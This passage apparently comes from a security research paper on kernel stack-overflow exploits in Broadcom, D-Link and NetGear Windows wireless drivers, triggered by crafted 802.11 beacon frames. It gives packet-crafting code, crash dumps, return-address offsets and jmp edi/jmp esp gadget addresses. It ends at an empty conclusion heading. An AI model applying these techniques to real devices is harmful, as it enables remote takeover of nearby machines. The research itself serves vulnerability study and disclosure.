    SSID_ie[0] = 0;
    SSID_ie[1] = 255;
    memset(SSID, 0x41, 255);

    // Okay, the SSID IE is ready for appending.
    P.AppendData(sizeof(SSID_ie), SSID_ie);

    P.print_hex_dump();
}

As a result of running this code, 802.11 beacon packets were produced that did indeed contain overly sized SSIDs. However, these packets appeared to have no effect on the BroadCom device driver.
After considerable head scratching, a modification was made to the program to see if a normally sized SSID would cause the device driver to process it. If it were processed, the fake SSID would show up in the list of available networks. Even after making this modification, the device driver still did not appear to be processing the manually crafted 802.11 beacon packets. Finally, it was realized that the driver might have checks in place such that it would only process beacon packets from networks that also respond to 802.11 probes. To test this theory, the code was changed in the manner shown below:

CreatePacketForExploit(BeaconPacket, basic_target);

// CreatePacket returns a beacon; we will also send out directed probe responses.
Packet_80211 ProbePacket = BeaconPacket;

ProbePacket.wlan_header->subtype = 5; // probe response
ProbePacket.setDstAddr(cfg.dst);

...

while(true)
{
    int ret = Send80211Packet(&in_tx, BeaconPacket);

    usleep(cfg.usleep);

    ret = Send80211Packet(&in_tx, ProbePacket);

    usleep(2*cfg.usleep);
}

Sending out directed probe responses as well as beacon packets caused results to be generated immediately. When a small SSID was sent, it would suddenly show up in the list of available wireless networks. When an overly sized SSID was sent, it resulted in a much desired bluescreen as a result of the stack overflow that Chris had identified. The following output shows some of the crash information associated with transmitting an SSID that consisted of 255 0xCC's:

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.
If kernel debugger is available get stack backtrace.
Arguments:
Arg1: ccccfe9d, memory referenced
Arg2: 00000002, IRQL
Arg3: 00000000, value 0 = read operation, 1 = write operation
Arg4: f6e713de, address which referenced memory
...
TRAP_FRAME:  80550004 -- (.trap ffffffff80550004)
ErrCode = 00000000
eax=cccccccc ebx=84ce62ac ecx=00000000 edx=84ce62ac esi=805500e0 edi=84ce6308
eip=f6e713de esp=80550078 ebp=805500e0 iopl=0  nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000  efl=00010246
bcmwl5+0xf3de:
f6e713de f680d131000002  test byte ptr [eax+31D1h],2  ds:0023:ccccfe9d=??
...
kd> k v
 *** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
805500e0 cccccccc cccccccc cccccccc cccccccc bcmwl5+0xf3de
80550194 f76a9f09 850890fc 80558e80 80558c20 0xcccccccc
805501ac 804dbbd4 850890b4 850890a0 00000000 NDIS!ndisMDpcX+0x21 (FPO: [Non-Fpo])
805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 (FPO: [0,0,0])
805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 (FPO: [0,0,0])

In this case, the crash occurred because a variable on the stack was overwritten that was subsequently used as a pointer; the overwritten pointer was then dereferenced through the eax register. Although the crash occurred as a result of the dereference, it's important to note that the return address for the stack frame was successfully overwritten with a controlled value of 0xcccccccc. If the function had been allowed to return cleanly without trying to dereference corrupted pointers, full control of the instruction pointer would have been obtained.
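As will be described next, a simple way to locate the exact offset of the return address is to transmit an SSID made up of incrementing bytes. Building such an SSID IE is trivial; a minimal sketch in the style of the earlier packet-crafting code:

/* SSID IE whose body is an incrementing byte pattern: the value that
   lands in the saved return address then reveals its offset. */
u_int8_t SSID_ie[257];
int i;

SSID_ie[0] = 0;    /* IE type: SSID */
SSID_ie[1] = 255;  /* IE length     */

for (i = 0; i < 255; i++)
    SSID_ie[i + 2] = (u_int8_t)i;  /* 0x00, 0x01, 0x02, ... */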
In order to avoid this crash and gain full control of the instruction pointer, it's necessary to calculate the offset of the return address from the start of the buffer that is being transmitted. Knowing this offset also reveals the minimum number of bytes that must be transmitted to trigger the overflow, which is important when it comes to preventing the dereference crash that was seen previously. There are many different ways in which the offset of the return address can be determined. In this situation, the simplest approach is to transmit a buffer that contains an incrementing array of bytes, as sketched above. For instance, byte index 0 is 0x00, byte index 1 is 0x01, and so on. The value that the return address is overwritten with then makes it possible to calculate its offset within the buffer. After transmitting a packet that makes use of this technique, the following crash is rendered:

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.
If kernel debugger is available get stack backtrace.
Arguments:
Arg1: 605f902e, memory referenced
Arg2: 00000002, IRQL
Arg3: 00000000, value 0 = read operation, 1 = write operation
Arg4: f73673de, address which referenced memory
...
STACK_TEXT:
80550004 f73673de badb0d00 84d8b250 80550084 nt!KiTrap0E+0x233
WARNING: Stack unwind information not available. Following frames may be wrong.
805500e0 5c5b5a59 605f5e5d 64636261 68676665 bcmwl5+0xf3de
80550194 f76a9f09 84e9e0fc 80558e80 80558c20 0x5c5b5a59
805501ac 804dbbd4 84e9e0b4 84e9e0a0 00000000 NDIS!ndisMDpcX+0x21
805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46
805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26

From this stack trace, it can be seen that the return address was overwritten with 0x5c5b5a59. Since byte-ordering on x86 is little endian, the return address lies at offset 0x59 within the buffer that contains the SSID. With knowledge of the offset at which the return address is overwritten, the next step becomes figuring out where in the buffer to place the arbitrary code that will be executed.

Before going down this route, it's important to provide a little bit of background on the format of 802.11 Management packets. Management packets encode all of their information in what the standard calls Information Elements (IEs). IEs have a one byte identifier followed by a one byte length, which is subsequently followed by the associated IE data. For those familiar with Type-Length-Value (TLV) encoding, IEs are roughly the same thing. Based on this definition, the largest possible IE is 257 bytes (2 bytes of overhead and 255 bytes of data). The upshot of these size restrictions is that the largest possible SSID that can be copied to the stack is 255 bytes.

When attempting to find the offset of the return address on the stack, an SSID IE was sent with a 255 byte SSID. Considering the fact that a stack overflow occurred, one might reasonably expect to find the entire 255 byte SSID on the stack. A quick dump of the stack can be used to validate this assumption:

kd> db esp L 256
80550078  2e f0 d9 84 0c 80 d8 84-00 80 d8 84 00 07 0e 01  ................
80550088  02 03 ff 00 01 02 03 04-05 06 07 08 09 0a 0b 0c  ................
80550098  0d 0e 0f 10 11 12 13 14-15 16 17 18 19 1a 1b 1c  ................
805500a8  1d 1e 1f 20 21 22 23 24-25 26 0b 28 0c 00 00 00  ... !"#$%&.(....
805500b8  82 84 8b 96 24 30 48 6c-0c 12 18 60 44 00 55 80  ....$0Hl...`D.U.
805500c8  3d 3e 3f 40 41 42 43 44-45 46 01 02 01 02 4b 4c  =>?@ABCDEF....KL
805500d8  4d 01 02 50 51 52 53 54-55 56 57 58 59 5a 5b 5c  M..PQRSTUVWXYZ[\
805500e8  5d 5e 5f 60 61 62 63 64-65 66 67 68 69 6a 6b 6c  ]^_`abcdefghijkl
805500f8  6d 6e 6f 70 71 72 73 74-75 76 77 78 79 7a 7b 7c  mnopqrstuvwxyz{|
80550108  7d 7e 7f 80 81 82 83 84-85 86 87 88 89 8a 8b 8c  }~..............
80550118  8d 8e 8f 90 91 92 93 94-95 96 97 98 99 9a 9b 9c  ................
80550128  9d 9e 9f a0 a1 a2 a3 a4-a5 a6 a7 a8 a9 aa ab ac  ................
80550138  ad ae af b0 b1 b2 b3 b4-b5 b6 b7 b8 b9 ba bb bc  ................
80550148  bd be bf c0 c1 c2 c3 c4-c5 c6 c7 c8 c9 ca cb cc  ................
80550158  cd ce cf d0 d1 d2 d3 d4-d5 d6 d7 d8 d9 da db dc  ................
80550168  dd de df e0 e1 e2 e3 e4-e5 e6 e7 e8 e9 ea eb ec  ................
80550178  ed ee ef f0 f1 f2 f3 f4-f5 f6 f7 f8 f9 fa fb fc  ................
80550188  fd fe e9 84 00 00 00 00-e0 9e 6a 01 ac 01 55 80  ..........j...U.

Based on this dump, it appears that the majority of the SSID was indeed copied across the stack. However, a large portion of the buffer prior to the offset of the return address has been mangled. In this instance, the return address appears to be located at 0x805500e4. While the area prior to this address appears mangled, the area succeeding it has remained intact.

In order to prove the possibility of gaining code execution, a good initial attempt would be to send a buffer that overwrites the return address with the address that immediately succeeds it (which will be composed of int3's). If everything works according to plan, the vulnerable function will return into the int3's and bluescreen the machine in a controlled fashion. This accomplishes two things. First, it proves that it is possible to redirect execution into a controllable buffer. Second, it gives a snapshot of the state of the registers at the time that execution control is redirected. The layout of the buffer that would need to be sent to trigger this condition is described in the diagram below:

[Padding.......][EIP][payload of int3's]
 ^               ^    ^
 |               |    \_ Can hold at most 163 bytes of arbitrary code.
 |               \_ Overwritten with 0x8055010d which points to the payload
 \_ Start of SSID that is mangled after the overflow occurs.

Transmitting a buffer that is structured as shown above does indeed result in a bluescreen. It is possible to differentiate actual crashes from those generated as the result of an int3 by looking at the bugcheck information. The use of an int3 will result in an unhandled kernel-mode exception, which is bugcheck code 0x8e. Furthermore, the exception code associated with this bugcheck (its first parameter) will be set to 0x80000003. Exception code 0x80000003 indicates that the unhandled exception was associated with a trap instruction. This is generally a good indication that the arbitrary code you specified has executed. It's also very useful in situations where it is not possible to do remote kernel debugging and one must rely strictly on crash dump analysis.

KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)
This is a very common bugcheck.  Usually the exception address pinpoints
the driver/function that caused the problem.  Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x80000003.
This means a hard coded breakpoint or assertion was hit, but this system was booted
/NODEBUG.  This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG.  This will let us see why this breakpoint is
happening.
Arguments:
Arg1: 80000003, The exception code that was not handled
Arg2: 8055010d, The address that the exception occurred at
Arg3: 80550088, Trap Frame
Arg4: 00000000
...
TRAP_FRAME:  80550088 -- (.trap ffffffff80550088)
ErrCode = 00000000
eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e
eip=8055010e esp=805500fc ebp=8055010d iopl=0  nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000  efl=00000246
nt!KiDoubleFaultStack+0x2c8e:
8055010e cc  int 3
...
STACK_TEXT:
8054fc50 8051d6a7 0000008e 80000003 8055010d nt!KeBugCheckEx+0x1b
80550018 804df235 80550034 00000000 80550088 nt!KiDispatchException+0x3b1
80550080 804df947 8055010d 8055010e badb0d00 nt!CommonDispatchException+0x4d
80550080 8055010e 8055010d 8055010e badb0d00 nt!KiTrap03+0xad
8055010d cccccccc cccccccc cccccccc cccccccc nt!KiDoubleFaultStack+0x2c8e
WARNING: Frame IP not in any known module. Following frames may be wrong.
80550111 cccccccc cccccccc cccccccc cccccccc 0xcccccccc
80550115 cccccccc cccccccc cccccccc cccccccc 0xcccccccc
80550119 cccccccc cccccccc cccccccc cccccccc 0xcccccccc
8055011d cccccccc cccccccc cccccccc cccccccc 0xcccccccc

The above crash dump information definitively shows that arbitrary code execution has been achieved. This is a big milestone; it pretty much proves that exploitation will be possible. However, it doesn't prove how reliable or portable that exploitation will be. For that reason, the next step involves identifying changes to the exploit that will make it more reliable and portable from one machine to the next. Fortunately, the current situation already appears to afford a good degree of portability, as the stack addresses don't appear to shift around from one crash to the next.

At this stage, the return address is being overwritten with a hard-coded stack address that points immediately after the return address in the buffer. One of the problems with this is that the amount of space immediately following the return address is limited to 163 bytes due to the maximum size of the SSID IE. This is enough room for a small payload stub, but probably not large enough for a payload that would provide anything interesting in terms of features. It's also worth noting that overwriting past the return address might clobber important elements on the stack that could lead to the system crashing at some later point for hard-to-explain reasons. When dealing with kernel-mode vulnerabilities, it is advisable to clobber as little state as possible in order to reduce the amount of collateral damage that might ensue.

Limiting the amount of data used in the overflow to only the amount needed to overwrite the return address means that the total size of the SSID IE will be too small to hold arbitrary code. However, there's no reason why code couldn't be placed in a completely separate IE unrelated to the SSID. This means a packet could be transmitted that included both the bogus SSID IE and another arbitrary IE which would be used to contain the arbitrary code.
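Appending such a secondary IE is straightforward. A sketch in the style of the earlier CreatePacketForExploit code is shown below; payload and payload_len are placeholders for the arbitrary code, and the vendor-specific IE type 0xdd (the type used by a WPA IE) serves as the container:

/* Carry the arbitrary code in a separate, well-formed IE */
u_int8_t payload_ie[257];

payload_ie[0] = 0xdd;                  /* vendor-specific (WPA) IE type */
payload_ie[1] = (u_int8_t)payload_len; /* body length, must be <= 255   */
memcpy(payload_ie + 2, payload, payload_len);

P.AppendData(2 + payload_len, payload_ie);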
Although this would work, it must be possible to find a reference to the arbitrary IE that contains the arbitrary code. One approach would be to search the address space for an intact copy of the 802.11 packet that was transmitted. Before going down that path, it makes sense to try to find instances of the packet in memory using the kernel debugger. A simple search of the address space using the destination MAC address of the packet sent is a good way to find potential matches. In this case, the destination MAC is 00:14:a5:06:8f:e6.

kd> .ignore_missing_pages 1
Suppress kernel summary dump missing page error message
kd> s 0x80000000 L?10000000 00 14 a5 06 8f e6
8418588a  00 14 a5 06 8f e6 ff ff-ff ff ff ff 40 0e 00 00  ............@...
841b0006  00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00  ................
841b1534  00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00  ................
84223028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845dc028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845de828  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845df828  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845f3028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845f3828  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845f4028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
845f5028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
84642d4c  00 14 a5 06 8f e6 00 00-f0 c6 2a 85 00 00 00 00  ..........*.....
846d6d4c  00 14 a5 06 8f e6 00 00-80 79 21 85 00 00 00 00  .........y!.....
84eda06c  00 14 a5 06 8f e6 02 06-01 01 00 0e 00 00 00 00  ................
84efdecc  00 14 a5 06 8f e6 00 00-65 00 00 00 16 00 25 0a  ........e.....%.

The above output shows that quite a few matches were found. One important thing to note is that the BSSID used in the packet that contained the overly sized SSID was 00:07:0e:01:02:03. In an 802.11 header, the addresses of Management packets are arranged in the order DST, SRC, BSSID. While some of the above matches do not appear to contain the entire packet contents, many of them do. Picking one of the matches at random shows the contents in more detail:

kd> db 84223028 L 128
84223028  00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01  ................
84223038  02 03 d0 cf 85 b1 b3 db-01 00 00 00 64 00 11 04  ............d...
84223048  00 ff 4a 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  ..J..U...U...U..
84223058  01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  .U...U...U...U..
84223068  01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  .U...U...U...U..
84223078  01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  .U...U...U...U..
84223088  01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  .U...U...U...U..
84223098  01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d  .U...U...U...U..
842230a8  01 55 80 cc cc cc cc cc-cc cc cc cc cc cc cc cc  .U..............
842230b8  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
842230c8  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
842230d8  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
842230e8  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
842230f8  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................
84223108  cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc  ................

Indeed, this does appear to be a full copy of the original packet.
The reason there are so many copies of the packet in memory might be that the current form of the exploit transmits packets in an infinite loop, causing the driver to have a few copies lingering in memory. The fact that multiple copies exist in memory is good news, considering it increases the number of places that could be used for return addresses. However, it's not as simple as hard-coding one of these addresses into the exploit, considering pool-allocated addresses will not be predictable. Instead, steps will need to be taken to find a reference to the packet through a register or through some other context. In this way, a very small stub could be placed after the return address in the buffer that would immediately transfer control into a copy of the packet somewhere else in memory.

Although some initial work with the debugger showed a couple of references to the original packet on the stack, a much simpler solution was identified. Consider the following register context at the time of the crash:

kd> r
Last set context:
eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e
eip=8055010e esp=805500fc ebp=8055010d iopl=0  nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000  efl=00000246
nt!KiDoubleFaultStack+0x2c8e:
8055010e cc  int 3

Inspecting each of these registers individually eventually shows that the edi register is pointing into a copy of the packet.

kd> db edi
845f302e  00 07 0e 01 02 03 00 07-0e 01 02 03 10 cf 85 b1  ................
845f303e  b3 db 01 00 00 00 64 00-11 04 00 ff 4a 0d 01 55  ......d.....J..U
845f304e  80 0d 01 55 80 0d 01 55-80 0d 01 55 80 0d 01 55  ...U...U...U...U

As chance would have it, edi is pointing to the source MAC in the 802.11 packet that was sent. If it had instead been pointing to the destination MAC or the end of the packet, it would not have been of any use. With edi pointing to the source MAC, the rest of the cards fall into place. The hard-coded stack address that was previously used to overwrite the return address can be replaced with an address (probably inside ntoskrnl.exe) that contains the equivalent of a jmp edi instruction. When the exploit is triggered and the vulnerable function returns, it will transfer control to the location that contains the jmp edi. The jmp edi, in turn, transfers control to the first byte of the source MAC. By setting the source MAC to some executable code, such as a relative jump instruction, it is possible to finally transfer control into the location of the packet that contains the arbitrary code that should be executed.

This solves the problem of using a hard-coded stack address as the return address and should help to make the exploit more reliable and portable between targets. However, this portability will be limited by the location of the jmp edi instruction that is used when overwriting the return address. Finding the location of a jmp edi instruction is relatively simple, although more effective measures could be used to cross-reference addresses in an effort to find something more portable. Experimentation shows that 0x8066662c is a reliable location:

kd> s nt L?10000000 ff e7
8063abce  ff e7 ff 21 47 70 21 83-98 03 00 00 eb 38 80 3d  ...!Gp!......8.=
806590ca  ff e7 ff 5f eb 05 bb 22-00 00 c0 8b ce e8 74 ff  ..._..."......t.
806590d9  ff e7 ff 5e 8b c3 5b c9-c2 08 00 cc cc cc cc cc  ...^..[.........
8066662c  ff e7 ff 8b d8 85 db 74-e0 33 d2 42 8b cb e8 d7  .......t.3.B....
806bb44b  ff e7 a3 6c ff a2 42 08-ff 3f 2a 1e f0 04 04 04  ...l..B..?*.....
...

With the exploit all but finished, the final question that remains unanswered is where the arbitrary code should be placed in the 802.11 packet. There are a few different ways that this could be tackled. The simplest solution would be to append the arbitrary code immediately after the SSID in the packet. However, this would make the packet malformed and might cause the driver to drop it. Alternatively, an arbitrary IE, such as a WPA IE, could be used as a container for the arbitrary code, as suggested earlier in this section. For now, the authors decided to take the middle road. By default, a WPA IE will be used as the container for all payloads, regardless of whether the payloads fit within the IE. This has the effect of allowing all payloads smaller than 256 bytes to be part of a well-formed packet. Payloads that are larger than 255 bytes will cause the packet to be malformed, but perhaps not enough to cause the driver to drop the packet. An alternate solution to this issue can be found in the NetGear case study.

At this point, the structure of the buffer and the packet as a whole have been completely researched and are ready to be tested. The only thing left to do is incorporate the arbitrary code that was described in section 4.1. Much time was spent debugging and improving this code in order to produce a reliable exploit.

5.2) D-Link

Soon after the Broadcom exploit was completed, the authors decided to write a suite of fuzzing modules that could discover similar issues in other wireless drivers. The first casualty of this process was the A5AGU.SYS driver provided with D-Link's DWL-G132 USB wireless adapter. The authors configured the test machine (Windows XP SP2) so that a complete snapshot of kernel memory was included in the system crash dumps. This ensures that when a crash occurs, enough useful information is there to debug the problem. Next, the latest driver for the target device (v1.0.1.41) was installed. Finally, the beacon fuzzing module was started and the card was inserted into the USB port of the test system. Five seconds later, a beautiful blue screen appeared while the crash dump was written to disk.

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.
If kernel debugger is available get stack backtrace.
Arguments:
Arg1: 56149a1b, memory referenced
Arg2: 00000002, IRQL
Arg3: 00000000, value 0 = read operation, 1 = write operation
Arg4: 56149a1b, address which referenced memory

ErrCode = 00000000
eax=00000000 ebx=82103ce0 ecx=00000002 edx=82864dd0 esi=f24105dc edi=8263b7a6
eip=56149a1b esp=80550658 ebp=82015000 iopl=0  nv up ei ng nz ac pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000  efl=00010296
56149a1b ?? ???

Resetting default scope

LAST_CONTROL_TRANSFER:  from 56149a1b to 804e2158

FAILED_INSTRUCTION_ADDRESS:
+56149a1b
56149a1b ?? ???
STACK_TEXT:
805505e4 56149a1b badb0d00 82864dd0 00000000 nt!KiTrap0E+0x233
80550654 82015000 82103ce0 81f15e10 8263b79c 0x56149a1b
80550664 f2408d54 81f15e10 82103c00 82015000 0x82015000
80550694 f24019cc 82015000 82103ce0 82015000 A5AGU+0x28d54
805506b8 f2413540 824ff008 0000000b 82015000 A5AGU+0x219cc
805506d8 f2414fae 824ff008 0000000b 0000000c A5AGU+0x33540
805506f4 f24146ae f241d328 8263b760 81f75000 A5AGU+0x34fae
80550704 f2417197 824ff008 00000001 8263b760 A5AGU+0x346ae
80550728 804e42cc 00000000 821f0008 00000000 A5AGU+0x37197
80550758 f74acee5 821f0008 822650a8 829fb028 nt!IopfCompleteRequest+0xa2
805507c0 f74adb57 8295a258 00000000 829fb7d8 USBPORT!USBPORT_CompleteTransfer+0x373
805507f0 f74ae754 026e6f44 829fb0e0 829fb0e0 USBPORT!USBPORT_DoneTransfer+0x137
80550828 f74aff6a 829fb028 804e3579 829fb230 USBPORT!USBPORT_FlushDoneTransferList+0x16c
80550854 f74bdfb0 829fb028 804e3579 829fb028 USBPORT!USBPORT_DpcWorker+0x224
80550890 f74be128 829fb028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e
805508ac 804dc179 829fb64c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166
805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46
805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26

Five seconds of fuzzing had produced a flaw that made it possible to gain control of the instruction pointer. In order to execute arbitrary code, however, a contextual reference to the malicious frame had to be located. In this case, the edi register pointed into the source address field of the frame in just the same way that it did in the Broadcom vulnerability. The bogus eip value can be found just past the source address where one would expect it -- inside one of the randomly generated information elements.

kd> dd 0x8263b7a6 (edi)
8263b7a6  f3793ee8 3ee8a34e a34ef379 6eb215f0
8263b7b6  fde19019 006431d8 9b001740 63594364

kd> s 0x8263b7a6 Lffff 0x1b 0x9a 0x14 0x56
8263bd2b  1b 9a 14 56 2a 85 56 63-00 55 0c 0f 63 6e 17 51  ...V*.Vc.U..cn.Q

The next step was to determine what information element was causing the crash. After decoding the in-memory version of the frame, a series of modifications and retransmissions were made until the specific information element leading to the crash was found. Through this method it was determined that a long Supported Rates information element triggers the stack overflow shown in the crash above.

Exploiting this flaw involved finding a return address in memory that pointed to a jmp edi, call edi, or push edi; ret instruction sequence. This was accomplished by running the msfpescan application included with the Metasploit Framework against the ntoskrnl.exe of our target. The resulting addresses had to be adjusted to account for the kernel's base address. The address that was chosen for this version of ntoskrnl.exe was 0x804f16eb ( 0x800d7000 + 0x0041a6eb ).

$ msfpescan ntoskrnl.exe -j edi
[ntoskrnl.exe]
0x0040365d push edi; retn 0x0001
0x00405aab call edi
0x00409d56 push edi; ret
0x0041a6eb jmp edi

Finally, the magic frame was reworked into an exploit module for the 3.0 version of the Metasploit Framework. When the exploit is launched, a stack overflow occurs and the return address is overwritten with the location of a jmp edi instruction, which in turn lands on the source address of the frame. The source address was modified to be a valid x86 relative jump, which directs execution into the body of the first information element. The maximum MTU of 802.11b is over 2300 bytes, allowing for payloads of up to 1000 bytes without running into reliability issues.
Since this exploit is sent to the broadcast address, all vulnerable clients within range of the attacker are exploited with a single frame.

5.3) NetGear

For the next test, the authors chose NetGear's WG111v2 USB wireless adapter. The machine used in the D-Link exploit was reused for this test (Windows XP SP2). The latest version of the WG111v2.SYS driver (v5.1213.6.316) was installed, the beacon fuzzer was started, and the adapter was connected to the test system. After about ten seconds, the system crashed and another gorgeous blue screen appeared.

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.
If kernel debugger is available get stack backtrace.
Arguments:
Arg1: dfa6e83c, memory referenced
Arg2: 00000002, IRQL
Arg3: 00000000, value 0 = read operation, 1 = write operation
Arg4: dfa6e83c, address which referenced memory

ErrCode = 00000000
eax=80550000 ebx=825c700c ecx=00000005 edx=f30e0000 esi=82615000 edi=825c7012
eip=dfa6e83c esp=80550684 ebp=b90ddf78 iopl=0  nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000  efl=00010246
dfa6e83c ?? ???

Resetting default scope

LAST_CONTROL_TRANSFER:  from dfa6e83c to 804e2158

FAILED_INSTRUCTION_ADDRESS:
+ffffffffdfa6e83c
dfa6e83c ?? ???

STACK_TEXT:
80550610 dfa6e83c badb0d00 f30e0000 0b9e1a2b nt!KiTrap0E+0x233
WARNING: Frame IP not in any known module. Following frames may be wrong.
80550680 79e1538d 14c4f76f 8c1cec8e ea20f5b9 0xdfa6e83c
80550684 14c4f76f 8c1cec8e ea20f5b9 63a92305 0x79e1538d
80550688 8c1cec8e ea20f5b9 63a92305 115cab0c 0x14c4f76f
8055068c ea20f5b9 63a92305 115cab0c c63e58cc 0x8c1cec8e
80550690 63a92305 115cab0c c63e58cc 6d90e221 0xea20f5b9
80550694 115cab0c c63e58cc 6d90e221 78d94283 0x63a92305
80550698 c63e58cc 6d90e221 78d94283 2b828309 0x115cab0c
8055069c 6d90e221 78d94283 2b828309 39d51a89 0xc63e58cc
805506a0 78d94283 2b828309 39d51a89 0f8524ea 0x6d90e221
805506a4 2b828309 39d51a89 0f8524ea c8f0583a 0x78d94283
805506a8 39d51a89 0f8524ea c8f0583a 7e98cd49 0x2b828309
805506ac 0f8524ea c8f0583a 7e98cd49 214b52ab 0x39d51a89
805506b0 c8f0583a 7e98cd49 214b52ab 139ef137 0xf8524ea
805506b4 7e98cd49 214b52ab 139ef137 a7693fa7 0xc8f0583a
805506b8 214b52ab 139ef137 a7693fa7 dfad502f 0x7e98cd49
805506bc 139ef137 a7693fa7 dfad502f 81212de6 0x214b52ab
805506c0 a7693fa7 dfad502f 81212de6 c46a3b2e 0x139ef137
805507c0 f74a1b57 825f1e40 00000000 829a87d8 0xa7693fa7
805507f0 f74a2754 026e6f44 829a80e0 829a80e0 USBPORT!USBPORT_DoneTransfer+0x137
80550828 f74a3f6a 829a8028 804e3579 829a8230 USBPORT!USBPORT_FlushDoneTransferList+0x16c
80550854 f74b1fb0 829a8028 804e3579 829a8028 USBPORT!USBPORT_DpcWorker+0x224
80550890 f74b2128 829a8028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e
805508ac 804dc179 829a864c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166
805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46
805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26

The crash indicates that not only did the fuzzer gain control of the driver's execution address, but the entire stack frame was smashed as well. The esp register points about a thousand bytes into the frame, and the bogus eip value lies inside another controlled area.
kd> dd 80550684
80550684  79e1538d 14c4f76f 8c1cec8e ea20f5b9
80550694  63a92305 115cab0c c63e58cc 6d90e221

kd> s 0x80550600 Lffff 0x3c 0xe8 0xa6 0xdf
80550608  3c e8 a6 df 10 06 55 80-78 df 0d b9 3c e8 a6 df  <.....U.x...<...
80550614  3c e8 a6 df 00 0d db ba-00 00 0e f3 2b 1a 9e 0b  <...........+...
80550678  3c e8 a6 df 08 00 00 00-46 02 01 00 8d 53 e1 79  <.......F....S.y
8055a524  3c e8 a6 df 02 00 00 00-00 00 00 00 3c e8 a6 df  <...........<...
8055a530  3c e8 a6 df 00 40 00 e1-00 00 00 00 00 00 00 00  <....@..........

Analyzing this bug took a lot more time than one might expect. Surprisingly, there is no single field or information element that triggers this flaw. Any series of information elements with a combined length greater than 1100 bytes will trigger the overflow if the SSID, Supported Rates, and Channel information elements are at the beginning. The driver will discard any frames where the IE chain is truncated or extends beyond the boundaries of the received frame. This was an annoyance, since a payload may be of arbitrary length and content and may not neatly fit into a 255 byte block of data (the maximum for a single IE). The solution was to treat the blob of padding and shellcode like a contiguous IE chain and pad the buffer based on the content and length of the frame. The exploit code would generate the buffer, then walk through the buffer as if it were a series of IEs, extending the very last IE via randomized padding. This results in a chain of garbage information elements which passes the driver's sanity checks and allows for clean exploitation.

For this bug, the esp register was the only one pointing into controlled data. This introduced another problem -- before the vulnerable function returned, it modified stack variables and left parts of the frame corrupted. Although the area pointed to by esp was stable, a corrupted block existed just beyond it. To solve this, a tiny block of assembly code was added to the exploit that, when executed, would jump to the real payload by calculating an offset from the eax register. Finding a jmp esp instruction was as simple as running msfpescan on ntoskrnl.exe and adjusting the result for the kernel base address. The address that was chosen for this version of ntoskrnl.exe was 0x804ed5cb (0x800d7000 + 0x004165cb).

$ msfpescan ntoskrnl.exe -j esp
[ntoskrnl.exe]
0x004165cb jmp esp

6) Conclusion

